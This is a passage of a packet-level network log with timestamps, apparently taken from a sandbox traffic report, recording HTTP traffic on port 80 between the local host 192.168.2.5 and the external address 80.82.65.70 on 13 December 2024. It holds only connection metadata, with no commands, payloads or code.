                                          Dec 13, 2024 06:12:58.968122005 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.968847036 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.968898058 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.968935966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.969005108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.969697952 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.969750881 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.969794989 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.969842911 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.970572948 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.970630884 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.970673084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.970721006 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.971450090 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.971507072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.971518040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.971571922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.972343922 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.972395897 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.972448111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.972517967 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.973191023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.973275900 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.973311901 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.973362923 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.974076986 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.974128962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.974168062 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.974226952 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.974945068 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.974992990 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.975042105 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.975092888 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.975831032 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.975874901 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.975967884 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.976028919 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.976706028 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.976751089 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.976821899 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.976867914 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.977550983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.977596045 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.977667093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.977715015 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.978444099 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.978492975 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.978524923 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.978574038 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.979391098 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.979469061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.979506969 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.979557037 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.980185032 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.980242014 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.980319977 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.980369091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.981055975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.981107950 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.981151104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.981198072 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.981915951 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.981977940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.982068062 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.982115984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.037946939 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.038033962 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.038127899 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.038127899 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.038139105 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.038230896 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.038259983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.038314104 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.039067984 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.039117098 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.039338112 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.039386988 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.039901972 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.039952993 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.039989948 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.040038109 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.040745020 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.040793896 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.040832043 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.040879011 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.041611910 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.041660070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.041685104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.041729927 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.042474985 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.042582035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.042658091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.043343067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.043397903 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.043433905 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.043517113 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.044197083 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.044255972 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.044297934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.045077085 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.045133114 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.045190096 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.045960903 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.046004057 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.046042919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.046504021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.046835899 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.046945095 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.046988964 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.047698975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.047811031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.047863960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.048547983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.048597097 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.073992968 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.074073076 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.074204922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.074206114 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.074354887 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.074395895 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.074404955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.074436903 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.075236082 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.075285912 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.075366974 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.075417995 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.076133013 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.076200962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.076242924 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.076961994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.077011108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.077085972 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.077851057 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.077886105 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.077898979 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.077929974 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.078716993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.078829050 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.078872919 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.079600096 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.079675913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.079788923 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.079843044 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.080471039 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.080521107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.080584049 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.080630064 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.081326008 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.423955917 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.424134016 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.424748898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.424802065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.424849033 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.424920082 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.425614119 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.425672054 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.425730944 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.425997019 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.426506996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.426564932 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.426599979 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.426654100 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.427350044 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.427406073 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.427445889 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.427503109 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.428217888 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.428277969 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.428319931 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.428376913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.429117918 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.429179907 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.429202080 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.429251909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.429969072 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.430018902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.430051088 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.430104017 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.430836916 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.430896044 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.430944920 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.431014061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.431696892 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.431746960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.431787014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.431869030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.432549000 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.432749987 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.458452940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.458544016 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.458633900 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.458848953 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.458982944 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.459152937 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.459743023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.459799051 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.459837914 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.460613012 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.460664988 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.460728884 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.461472034 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.461545944 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.461581945 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.461630106 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.462347031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.462399960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.462444067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.462584019 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.463242054 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.463301897 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.463361025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.463406086 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.464109898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.464159966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.464174032 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.464202881 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.464977026 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.465037107 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.465101004 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.465178967 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.465853930 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.465909004 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.465950966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.465997934 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.500999928 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.501096010 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.501295090 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.501383066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.501480103 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.501544952 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.502257109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.502378941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.502433062 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.503133059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.503186941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.539782047 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.539886951 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.539971113 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.540199041 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.540258884 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.540297985 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.541096926 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.541162014 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.541338921 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.541387081 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.541423082 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.541738987 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.542252064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.542296886 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.542359114 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.542402983 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.543108940 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.543154955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.543217897 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.543267012 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.543978930 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.544054031 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.544121027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.544332027 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.544847012 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.544908047 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.545011044 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.545058966 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.545706987 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.545758009 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.545828104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.545877934 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.546597004 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.546683073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.546744108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.547458887 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.547517061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.547557116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.547604084 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.548321962 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.548372984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.548485994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.548538923 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.549202919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.549261093 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.549278975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.549335957 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.550069094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.550146103 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.550165892 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.550307989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.550960064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.551009893 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.551049948 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.551143885 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.551814079 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.551872015 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.551911116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.552268028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.552731037 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.552788019 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.552818060 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.552862883 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.553554058 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.553627014 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.553656101 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.553847075 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.554451942 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.554503918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.554538965 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.554584980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.555316925 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.555411100 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.555465937 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.556183100 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.556231976 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.556293964 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.557056904 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.557106018 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.557141066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.557466984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.557914019 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.557976961 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.558006048 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.558063030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.558808088 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.558897018 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.558918953 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.558969021 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.559679031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.559746981 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.559811115 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.559973955 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.560523033 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.560597897 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.560627937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.560674906 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.561395884 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.561471939 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.561506987 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.561549902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.562252998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.562308073 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.613790989 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.613857985 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.613913059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.613929033 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.613979101 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.614058971 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.614116907 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.614671946 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.614737034 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.614789009 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.614840031 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.615561008 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.615612984 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.615648031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.615694046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.616417885 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.616471052 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:59.616513014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:59.616559029 CET4978680192.168.2.580.82.65.70
